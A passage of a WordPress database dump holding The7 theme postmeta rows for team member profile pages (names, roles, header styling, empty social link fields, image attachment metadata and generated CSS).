(26427,3637,'_dt_fancy_header_bg_image_origin','custom'),
(26428,3637,'_dt_fancy_header_bg_image','a:0:{}'),
(26429,3637,'_dt_fancy_header_bg_repeat','no-repeat'),
(26430,3637,'_dt_fancy_header_bg_position_x','center'),
(26431,3637,'_dt_fancy_header_bg_position_y','center'),
(26432,3637,'_dt_fancy_header_bg_fullscreen','1'),
(26433,3637,'_dt_fancy_header_bg_overlay','0'),
(26434,3637,'_dt_fancy_header_overlay_color','#000'),
(26435,3637,'_dt_fancy_header_bg_overlay_opacity','50'),
(26436,3637,'_dt_fancy_header_scroll_effect','default'),
(26437,3637,'_dt_fancy_header_bg_parallax','0.5'),
(26438,3637,'_dt_fancy_header_responsiveness_heading',''),
(26439,3637,'_dt_fancy_header_responsiveness','disabled'),
(26440,3637,'_dt_fancy_header_responsiveness_switch','778px'),
(26441,3637,'_dt_fancy_header_responsive_height','70'),
(26442,3637,'_dt_fancy_header_responsive_font_size','30'),
(26443,3637,'_dt_fancy_header_responsive_title_line_height','38'),
(26444,3637,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(26445,3637,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(26446,3637,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(26447,3637,'_dt_teammate_options_go_to_single','1'),
(26448,3637,'_dt_teammate_options_position',''),
(26449,3637,'_dt_teammate_options_website',''),
(26450,3637,'_dt_teammate_options_mail',''),
(26451,3637,'_dt_teammate_options_facebook',''),
(26452,3637,'_dt_teammate_options_twitter',''),
(26453,3637,'_dt_teammate_options_dribbble',''),
(26454,3637,'_dt_teammate_options_you-tube',''),
(26455,3637,'_dt_teammate_options_rss',''),
(26456,3637,'_dt_teammate_options_delicious',''),
(26457,3637,'_dt_teammate_options_flickr',''),
(26458,3637,'_dt_teammate_options_lastfm',''),
(26459,3637,'_dt_teammate_options_linkedin',''),
(26460,3637,'_dt_teammate_options_vimeo',''),
(26461,3637,'_dt_teammate_options_tumbler',''),
(26462,3637,'_dt_teammate_options_pinterest',''),
(26463,3637,'_dt_teammate_options_devian',''),
(26464,3637,'_dt_teammate_options_skype',''),
(26465,3637,'_dt_teammate_options_github',''),
(26466,3637,'_dt_teammate_options_instagram',''),
(26467,3637,'_dt_teammate_options_stumbleupon',''),
(26468,3637,'_dt_teammate_options_behance',''),
(26469,3637,'_dt_teammate_options_px-500',''),
(26470,3637,'_dt_teammate_options_tripedvisor',''),
(26471,3637,'_dt_teammate_options_vk',''),
(26472,3637,'_dt_teammate_options_foursquare',''),
(26473,3637,'_dt_teammate_options_xing',''),
(26474,3637,'_dt_teammate_options_weibo',''),
(26475,3637,'_dt_teammate_options_odnoklassniki',''),
(26476,3637,'_dt_teammate_options_research-gate',''),
(26477,3637,'_dt_teammate_options_yelp',''),
(26478,3637,'_dt_teammate_options_blogger',''),
(26479,3637,'_dt_teammate_options_soundcloud',''),
(26480,3637,'_dt_teammate_options_viber',''),
(26481,3637,'_dt_teammate_options_whatsapp',''),
(26482,3637,'_dt_teammate_options_reddit',''),
(26483,3637,'_dt_teammate_options_snapchat',''),
(26484,3637,'_dt_teammate_options_telegram',''),
(26485,3637,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(26486,3639,'_edit_lock','1674365519:1'),
(26487,3640,'_wp_attached_file','2023/01/m4.jpg'),
(26488,3640,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:106;s:6:\"height\";i:135;s:4:\"file\";s:14:\"2023/01/m4.jpg\";s:8:\"filesize\";i:5777;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26489,3639,'_thumbnail_id','3640'),
(26490,3639,'_edit_last','1'),
(26491,3639,'_dt_sidebar_position','disabled'),
(26492,3639,'_dt_sidebar_widgetarea_id','sidebar_1'),
(26493,3639,'_dt_sidebar_hide_on_mobile','0'),
(26494,3639,'_dt_footer_show','1'),
(26495,3639,'_dt_footer_widgetarea_id','sidebar_2'),
(26496,3639,'_dt_footer_hide_on_mobile','0'),
(26497,3639,'_dt_header_title','fancy'),
(26498,3639,'_dt_header_background','normal'),
(26499,3639,'_dt_header_background_below_slideshow','disabled'),
(26500,3639,'_dt_header_transparent_bg_color_scheme','light'),
(26501,3639,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(26502,3639,'_dt_header_transparent_top_bar_bg_opacity','25'),
(26503,3639,'_dt_header_transparent_bg_color','#000000'),
(26504,3639,'_dt_header_transparent_bg_opacity','50'),
(26505,3639,'_dt_header_disabled_background','normal'),
(26506,3639,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(26507,3639,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(26508,3639,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(26509,3639,'_dt_header_disabled_transparent_bg_color','#000000'),
(26510,3639,'_dt_header_disabled_transparent_bg_opacity','50'),
(26511,3639,'_dt_page_overrides_top_margin',''),
(26512,3639,'_dt_page_overrides_right_margin',''),
(26513,3639,'_dt_page_overrides_bottom_margin',''),
(26514,3639,'_dt_page_overrides_left_margin',''),
(26515,3639,'_dt_mobile_page_padding_top',''),
(26516,3639,'_dt_mobile_page_padding_right',''),
(26517,3639,'_dt_mobile_page_padding_bottom',''),
(26518,3639,'_dt_mobile_page_padding_left',''),
(26519,3639,'_dt_fancy_header_layout_heading',''),
(26520,3639,'_dt_fancy_header_title_aligment','center'),
(26521,3639,'_dt_fancy_header_height','300'),
(26522,3639,'_dt_fancy_header_padding-top','0px'),
(26523,3639,'_dt_fancy_header_padding-bottom','0px'),
(26524,3639,'_dt_fancy_header_breadcrumbs_heading',''),
(26525,3639,'_dt_fancy_header_breadcrumbs','disabled'),
(26526,3639,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(26527,3639,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(26528,3639,'_dt_fancy_header_title_heading',''),
(26529,3639,'_dt_fancy_header_title_mode','custom'),
(26530,3639,'_dt_fancy_header_title','S. K. P. Kushwaha'),
(26531,3639,'_dt_fancy_header_title_font_size','30'),
(26532,3639,'_dt_fancy_header_title_line_height','36'),
(26533,3639,'_dt_fancy_header_text_transform','none'),
(26534,3639,'_dt_fancy_header_title_color_mode','color'),
(26535,3639,'_dt_fancy_header_title_color','#ffffff'),
(26536,3639,'_dt_fancy_header_subtitle_heading',''),
(26537,3639,'_dt_fancy_header_subtitle','Newsletter Editor in Chief'),
(26538,3639,'_dt_fancy_header_subtitle_font_size','18'),
(26539,3639,'_dt_fancy_header_subtitle_line_height','26'),
(26540,3639,'_dt_fancy_header_subtitle_text_transform','none'),
(26541,3639,'_dt_fancy_header_subtitle_color_mode','color'),
(26542,3639,'_dt_fancy_header_subtitle_color','#ffffff'),
(26543,3639,'_dt_fancy_header_bg_heading',''),
(26544,3639,'_dt_fancy_header_bg_color','#222222'),
(26545,3639,'_dt_fancy_header_bg_image_origin','custom'),
(26546,3639,'_dt_fancy_header_bg_image','a:0:{}'),
(26547,3639,'_dt_fancy_header_bg_repeat','no-repeat'),
(26548,3639,'_dt_fancy_header_bg_position_x','center'),
(26549,3639,'_dt_fancy_header_bg_position_y','center'),
(26550,3639,'_dt_fancy_header_bg_fullscreen','1'),
(26551,3639,'_dt_fancy_header_bg_overlay','0'),
(26552,3639,'_dt_fancy_header_overlay_color','#000'),
(26553,3639,'_dt_fancy_header_bg_overlay_opacity','50'),
(26554,3639,'_dt_fancy_header_scroll_effect','default'),
(26555,3639,'_dt_fancy_header_bg_parallax','0.5'),
(26556,3639,'_dt_fancy_header_responsiveness_heading',''),
(26557,3639,'_dt_fancy_header_responsiveness','enabled'),
(26558,3639,'_dt_fancy_header_responsiveness_switch','778px'),
(26559,3639,'_dt_fancy_header_responsive_height','70'),
(26560,3639,'_dt_fancy_header_responsive_font_size','30'),
(26561,3639,'_dt_fancy_header_responsive_title_line_height','38'),
(26562,3639,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(26563,3639,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(26564,3639,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(26565,3639,'_dt_teammate_options_go_to_single','1'),
(26566,3639,'_dt_teammate_options_position',''),
(26567,3639,'_dt_teammate_options_website',''),
(26568,3639,'_dt_teammate_options_mail',''),
(26569,3639,'_dt_teammate_options_facebook',''),
(26570,3639,'_dt_teammate_options_twitter',''),
(26571,3639,'_dt_teammate_options_dribbble',''),
(26572,3639,'_dt_teammate_options_you-tube',''),
(26573,3639,'_dt_teammate_options_rss',''),
(26574,3639,'_dt_teammate_options_delicious',''),
(26575,3639,'_dt_teammate_options_flickr',''),
(26576,3639,'_dt_teammate_options_lastfm',''),
(26577,3639,'_dt_teammate_options_linkedin',''),
(26578,3639,'_dt_teammate_options_vimeo',''),
(26579,3639,'_dt_teammate_options_tumbler',''),
(26580,3639,'_dt_teammate_options_pinterest',''),
(26581,3639,'_dt_teammate_options_devian',''),
(26582,3639,'_dt_teammate_options_skype',''),
(26583,3639,'_dt_teammate_options_github',''),
(26584,3639,'_dt_teammate_options_instagram',''),
(26585,3639,'_dt_teammate_options_stumbleupon',''),
(26586,3639,'_dt_teammate_options_behance',''),
(26587,3639,'_dt_teammate_options_px-500',''),
(26588,3639,'_dt_teammate_options_tripedvisor',''),
(26589,3639,'_dt_teammate_options_vk',''),
(26590,3639,'_dt_teammate_options_foursquare',''),
(26591,3639,'_dt_teammate_options_xing',''),
(26592,3639,'_dt_teammate_options_weibo',''),
(26593,3639,'_dt_teammate_options_odnoklassniki',''),
(26594,3639,'_dt_teammate_options_research-gate',''),
(26595,3639,'_dt_teammate_options_yelp',''),
(26596,3639,'_dt_teammate_options_blogger',''),
(26597,3639,'_dt_teammate_options_soundcloud',''),
(26598,3639,'_dt_teammate_options_viber',''),
(26599,3639,'_dt_teammate_options_whatsapp',''),
(26600,3639,'_dt_teammate_options_reddit',''),
(26601,3639,'_dt_teammate_options_snapchat',''),
(26602,3639,'_dt_teammate_options_telegram',''),
(26603,3639,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(26604,3641,'_edit_lock','1674365634:1'),
(26605,3642,'_wp_attached_file','2023/01/m5.jpg'),
(26606,3642,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:180;s:6:\"height\";i:247;s:4:\"file\";s:14:\"2023/01/m5.jpg\";s:8:\"filesize\";i:17566;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"m5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4952;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(26607,3641,'_thumbnail_id','3642'),
(26608,3641,'_edit_last','1'),
(26609,3641,'_dt_sidebar_position','disabled'),
(26610,3641,'_dt_sidebar_widgetarea_id','sidebar_1'),
(26611,3641,'_dt_sidebar_hide_on_mobile','0'),
(26612,3641,'_dt_footer_show','1'),
(26613,3641,'_dt_footer_widgetarea_id','sidebar_2'),
(26614,3641,'_dt_footer_hide_on_mobile','0'),
(26615,3641,'_dt_header_title','fancy'),
(26616,3641,'_dt_header_background','normal'),
(26617,3641,'_dt_header_background_below_slideshow','disabled'),
(26618,3641,'_dt_header_transparent_bg_color_scheme','light'),
(26619,3641,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(26620,3641,'_dt_header_transparent_top_bar_bg_opacity','25'),
(26621,3641,'_dt_header_transparent_bg_color','#000000'),
(26622,3641,'_dt_header_transparent_bg_opacity','50'),
(26623,3641,'_dt_header_disabled_background','normal'),
(26624,3641,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(26625,3641,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(26626,3641,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(26627,3641,'_dt_header_disabled_transparent_bg_color','#000000'),
(26628,3641,'_dt_header_disabled_transparent_bg_opacity','50'),
(26629,3641,'_dt_page_overrides_top_margin',''),
(26630,3641,'_dt_page_overrides_right_margin',''),
(26631,3641,'_dt_page_overrides_bottom_margin',''),
(26632,3641,'_dt_page_overrides_left_margin',''),
(26633,3641,'_dt_mobile_page_padding_top',''),
(26634,3641,'_dt_mobile_page_padding_right',''),
(26635,3641,'_dt_mobile_page_padding_bottom',''),
(26636,3641,'_dt_mobile_page_padding_left',''),
(26637,3641,'_dt_fancy_header_layout_heading',''),
(26638,3641,'_dt_fancy_header_title_aligment','center'),
(26639,3641,'_dt_fancy_header_height','300'),
(26640,3641,'_dt_fancy_header_padding-top','0px'),
(26641,3641,'_dt_fancy_header_padding-bottom','0px'),
(26642,3641,'_dt_fancy_header_breadcrumbs_heading',''),
(26643,3641,'_dt_fancy_header_breadcrumbs','disabled'),
(26644,3641,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(26645,3641,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(26646,3641,'_dt_fancy_header_title_heading',''),
(26647,3641,'_dt_fancy_header_title_mode','custom'),
(26648,3641,'_dt_fancy_header_title','Miguel Luis R. Lagahit'),
(26649,3641,'_dt_fancy_header_title_font_size','30'),
(26650,3641,'_dt_fancy_header_title_line_height','36'),
(26651,3641,'_dt_fancy_header_text_transform','none'),
(26652,3641,'_dt_fancy_header_title_color_mode','color'),
(26653,3641,'_dt_fancy_header_title_color','#ffffff'),
(26654,3641,'_dt_fancy_header_subtitle_heading',''),
(26655,3641,'_dt_fancy_header_subtitle','Social Media Coordinator'),
(26656,3641,'_dt_fancy_header_subtitle_font_size','18'),
(26657,3641,'_dt_fancy_header_subtitle_line_height','26'),
(26658,3641,'_dt_fancy_header_subtitle_text_transform','none'),
(26659,3641,'_dt_fancy_header_subtitle_color_mode','color'),
(26660,3641,'_dt_fancy_header_subtitle_color','#ffffff'),
(26661,3641,'_dt_fancy_header_bg_heading',''),
(26662,3641,'_dt_fancy_header_bg_color','#222222'),
(26663,3641,'_dt_fancy_header_bg_image_origin','custom'),
(26664,3641,'_dt_fancy_header_bg_image','a:0:{}'),
(26665,3641,'_dt_fancy_header_bg_repeat','no-repeat'),
(26666,3641,'_dt_fancy_header_bg_position_x','center'),
(26667,3641,'_dt_fancy_header_bg_position_y','center'),
(26668,3641,'_dt_fancy_header_bg_fullscreen','1'),
(26669,3641,'_dt_fancy_header_bg_overlay','0'),
(26670,3641,'_dt_fancy_header_overlay_color','#000'),
(26671,3641,'_dt_fancy_header_bg_overlay_opacity','50'),
(26672,3641,'_dt_fancy_header_scroll_effect','default'),
(26673,3641,'_dt_fancy_header_bg_parallax','0.5'),
(26674,3641,'_dt_fancy_header_responsiveness_heading',''),
(26675,3641,'_dt_fancy_header_responsiveness','disabled'),
(26676,3641,'_dt_fancy_header_responsiveness_switch','778px'),
(26677,3641,'_dt_fancy_header_responsive_height','70'),
(26678,3641,'_dt_fancy_header_responsive_font_size','30'),
(26679,3641,'_dt_fancy_header_responsive_title_line_height','38'),
(26680,3641,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(26681,3641,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(26682,3641,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(26683,3641,'_dt_teammate_options_go_to_single','1'),
(26684,3641,'_dt_teammate_options_position',''),
(26685,3641,'_dt_teammate_options_website',''),
(26686,3641,'_dt_teammate_options_mail',''),
(26687,3641,'_dt_teammate_options_facebook',''),
(26688,3641,'_dt_teammate_options_twitter',''),
(26689,3641,'_dt_teammate_options_dribbble',''),
(26690,3641,'_dt_teammate_options_you-tube',''),
(26691,3641,'_dt_teammate_options_rss',''),
(26692,3641,'_dt_teammate_options_delicious',''),
(26693,3641,'_dt_teammate_options_flickr',''),
(26694,3641,'_dt_teammate_options_lastfm',''),
(26695,3641,'_dt_teammate_options_linkedin',''),
(26696,3641,'_dt_teammate_options_vimeo',''),
(26697,3641,'_dt_teammate_options_tumbler',''),
(26698,3641,'_dt_teammate_options_pinterest',''),
(26699,3641,'_dt_teammate_options_devian',''),
(26700,3641,'_dt_teammate_options_skype',''),
(26701,3641,'_dt_teammate_options_github',''),
(26702,3641,'_dt_teammate_options_instagram',''),
(26703,3641,'_dt_teammate_options_stumbleupon',''),
(26704,3641,'_dt_teammate_options_behance',''),
(26705,3641,'_dt_teammate_options_px-500',''),
(26706,3641,'_dt_teammate_options_tripedvisor',''),
(26707,3641,'_dt_teammate_options_vk',''),
(26708,3641,'_dt_teammate_options_foursquare',''),
(26709,3641,'_dt_teammate_options_xing',''),
(26710,3641,'_dt_teammate_options_weibo',''),
(26711,3641,'_dt_teammate_options_odnoklassniki',''),
(26712,3641,'_dt_teammate_options_research-gate',''),
(26713,3641,'_dt_teammate_options_yelp',''),
(26714,3641,'_dt_teammate_options_blogger',''),
(26715,3641,'_dt_teammate_options_soundcloud',''),
(26716,3641,'_dt_teammate_options_viber',''),
(26717,3641,'_dt_teammate_options_whatsapp',''),
(26718,3641,'_dt_teammate_options_reddit',''),
(26719,3641,'_dt_teammate_options_snapchat',''),
(26720,3641,'_dt_teammate_options_telegram',''),
(26721,3641,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(26722,3643,'_edit_lock','1674365886:1'),
(26723,3644,'_wp_attached_file','2023/01/m6.jpg'),
(26724,3644,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:180;s:6:\"height\";i:153;s:4:\"file\";s:14:\"2023/01/m6.jpg\";s:8:\"filesize\";i:12728;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:14:\"m6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5201;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(26725,3643,'_thumbnail_id','3644'),
(26726,3643,'_edit_last','1'),
(26727,3643,'_dt_sidebar_position','disabled'),
(26728,3643,'_dt_sidebar_widgetarea_id','sidebar_1'),
(26729,3643,'_dt_sidebar_hide_on_mobile','0'),
(26730,3643,'_dt_footer_show','1'),
(26731,3643,'_dt_footer_widgetarea_id','sidebar_2'),
(26732,3643,'_dt_footer_hide_on_mobile','0'),
(26733,3643,'_dt_header_title','fancy'),
(26734,3643,'_dt_header_background','normal'),
(26735,3643,'_dt_header_background_below_slideshow','disabled'),
(26736,3643,'_dt_header_transparent_bg_color_scheme','light'),
(26737,3643,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(26738,3643,'_dt_header_transparent_top_bar_bg_opacity','25'),
(26739,3643,'_dt_header_transparent_bg_color','#000000'),
(26740,3643,'_dt_header_transparent_bg_opacity','50'),
(26741,3643,'_dt_header_disabled_background','normal'),
(26742,3643,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(26743,3643,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(26744,3643,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(26745,3643,'_dt_header_disabled_transparent_bg_color','#000000'),
(26746,3643,'_dt_header_disabled_transparent_bg_opacity','50'),
(26747,3643,'_dt_page_overrides_top_margin',''),
(26748,3643,'_dt_page_overrides_right_margin',''),
(26749,3643,'_dt_page_overrides_bottom_margin',''),
(26750,3643,'_dt_page_overrides_left_margin',''),
(26751,3643,'_dt_mobile_page_padding_top',''),
(26752,3643,'_dt_mobile_page_padding_right',''),
(26753,3643,'_dt_mobile_page_padding_bottom',''),
(26754,3643,'_dt_mobile_page_padding_left',''),
(26755,3643,'_dt_fancy_header_layout_heading',''),
(26756,3643,'_dt_fancy_header_title_aligment','center'),
(26757,3643,'_dt_fancy_header_height','300'),
(26758,3643,'_dt_fancy_header_padding-top','0px'),
(26759,3643,'_dt_fancy_header_padding-bottom','0px'),
(26760,3643,'_dt_fancy_header_breadcrumbs_heading',''),
(26761,3643,'_dt_fancy_header_breadcrumbs','disabled'),
(26762,3643,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(26763,3643,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(26764,3643,'_dt_fancy_header_title_heading',''),
(26765,3643,'_dt_fancy_header_title_mode','custom'),
(26766,3643,'_dt_fancy_header_title','Chukwuma Okolie'),
(26767,3643,'_dt_fancy_header_title_font_size','30'),
(26768,3643,'_dt_fancy_header_title_line_height','36'),
(26769,3643,'_dt_fancy_header_text_transform','none'),
(26770,3643,'_dt_fancy_header_title_color_mode','color'),
(26771,3643,'_dt_fancy_header_title_color','#ffffff'),
(26772,3643,'_dt_fancy_header_subtitle_heading',''),
(26773,3643,'_dt_fancy_header_subtitle','Board Member'),
(26774,3643,'_dt_fancy_header_subtitle_font_size','18'),
(26775,3643,'_dt_fancy_header_subtitle_line_height','26'),
(26776,3643,'_dt_fancy_header_subtitle_text_transform','none'),
(26777,3643,'_dt_fancy_header_subtitle_color_mode','color'),
(26778,3643,'_dt_fancy_header_subtitle_color','#ffffff'),
(26779,3643,'_dt_fancy_header_bg_heading',''),
(26780,3643,'_dt_fancy_header_bg_color','#222222'),
(26781,3643,'_dt_fancy_header_bg_image_origin','custom'),
(26782,3643,'_dt_fancy_header_bg_image','a:0:{}'),
(26783,3643,'_dt_fancy_header_bg_repeat','no-repeat'),
(26784,3643,'_dt_fancy_header_bg_position_x','center'),
(26785,3643,'_dt_fancy_header_bg_position_y','center'),
(26786,3643,'_dt_fancy_header_bg_fullscreen','1'),
(26787,3643,'_dt_fancy_header_bg_overlay','0'),
(26788,3643,'_dt_fancy_header_overlay_color','#000'),
(26789,3643,'_dt_fancy_header_bg_overlay_opacity','50'),
(26790,3643,'_dt_fancy_header_scroll_effect','default'),
(26791,3643,'_dt_fancy_header_bg_parallax','0.5'),
(26792,3643,'_dt_fancy_header_responsiveness_heading',''),
(26793,3643,'_dt_fancy_header_responsiveness','disabled'),
(26794,3643,'_dt_fancy_header_responsiveness_switch','778px'),
(26795,3643,'_dt_fancy_header_responsive_height','70'),
(26796,3643,'_dt_fancy_header_responsive_font_size','30'),
(26797,3643,'_dt_fancy_header_responsive_title_line_height','38'),
(26798,3643,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(26799,3643,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(26800,3643,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(26801,3643,'_dt_teammate_options_go_to_single','1'),
(26802,3643,'_dt_teammate_options_position',''),
(26803,3643,'_dt_teammate_options_website',''),
(26804,3643,'_dt_teammate_options_mail',''),
(26805,3643,'_dt_teammate_options_facebook',''),
(26806,3643,'_dt_teammate_options_twitter',''),
(26807,3643,'_dt_teammate_options_dribbble',''),
